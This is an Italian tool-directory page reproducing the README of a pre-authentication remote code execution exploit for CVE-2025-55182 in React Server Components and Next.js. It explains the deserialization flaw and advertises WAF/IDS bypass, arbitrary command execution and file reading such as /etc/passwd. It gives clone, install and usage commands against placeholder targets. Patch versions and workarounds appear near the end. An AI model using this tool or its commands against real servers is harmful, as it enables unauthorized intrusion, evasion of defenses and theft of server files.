Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Exploit RCE pre-autenticazione per CVE-2025-55182 (React2Shell) che prende di mira React Server Components. Include scansione, verifica OAST, bypass WAF, esecuzione di comandi e lettura di file. | Kitploit
Strumenti/GitHubGitHub/sentinelxofficial/cve-2025-55182
RicognizioneAnalisi delle VulnerabilitàExploitEvasione IDS/IPSSfruttamento di Applicazioni WebBypass WAFPenetration TestingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Exploit RCE pre-autenticazione per CVE-2025-55182 (React2Shell) che prende di mira React Server Components. Include scansione, verifica OAST, bypass WAF, esecuzione di comandi e lettura di file.

Vedi Repository
142 mesi faNon ancora revisionato
Condividi

CVE-2025-55182 — React2Shell

Esecuzione remota di codice (RCE) pre-autenticazione in React Server Components (RSC), Next.js e framework correlati.

CVE CVSS Type Author


Panoramica

CVE-2025-55182 (nota anche come React2Shell) è una vulnerabilità critica di RCE pre-autenticazione che colpisce l'ecosistema React Server Components (RSC). Un attaccante non autenticato può compromettere completamente un server vulnerabile con una singola richiesta HTTP POST appositamente elaborata.

Analisi Tecnica

Causa Principale

React Server Components utilizza un formato wire personalizzato chiamato React Flight per serializzare riferimenti a funzioni e chiamate di moduli. La vulnerabilità risiede nel meccanismo di decodifica dei payload che elabora le richieste POST in arrivo verso gli endpoint RSC.

Quando il server riceve un payload React Flight, deserializza il contenuto senza un'adeguata validazione, fidandosi dei campi $$typeof controllati dall'attaccante e della risoluzione dei riferimenti ai moduli. Ciò consente a un attaccante di:

  1. Fare riferimento a moduli integrati arbitrari di Node.js (es. child_process, fs, net)
  2. Concatenare chiamate di funzione tramite il marcatore di tipo $F (funzione)
  3. Eseguire codice arbitrario nel runtime del server Node.js

Versioni Interessate

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Funzionalità

  • Scansione – Rileva endpoint RSC vulnerabili e identifica le versioni di Next.js/React.
  • Verifica (OAST) – Invia payload out‑of‑band per confermare la RCE tramite callback DNS/HTTP.
  • Bypass – Evasione completa di WAF/IDS: mutazioni del content-type, codifica dei payload, spoofing degli header, varianti di path e payload WAF.
  • Esecuzione – Esegue comandi di sistema arbitrari sul target (es. id, whoami).
  • Lettura – Legge file arbitrari dal server (es. /etc/passwd, package.json).
  • Output JSON – Risultati machine‑readable per l'integrazione.

Installazione

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Utilizzo

Scansione di Base

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Verifica RCE con OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Test Completo di Bypass

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Esegui Comandi

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Leggi File

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Utilizzo di un Proxy (es. Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Struttura dei File

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Mitigazione

Patch (Consigliata)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Workaround Temporanei

· Disattivare le Server Functions ("use server") · Regole WAF per bloccare Content-Type: text/x-component · Segmentazione di rete per gli endpoint RSC


Riferimenti

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Disclaimer: Solo per test di sicurezza autorizzati.

Autore: SentinelX · https://t.me/SentinelXsecurity

Scarica lo strumento
PacchettoVulnerabileCorretta
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (vedi patch)release corrette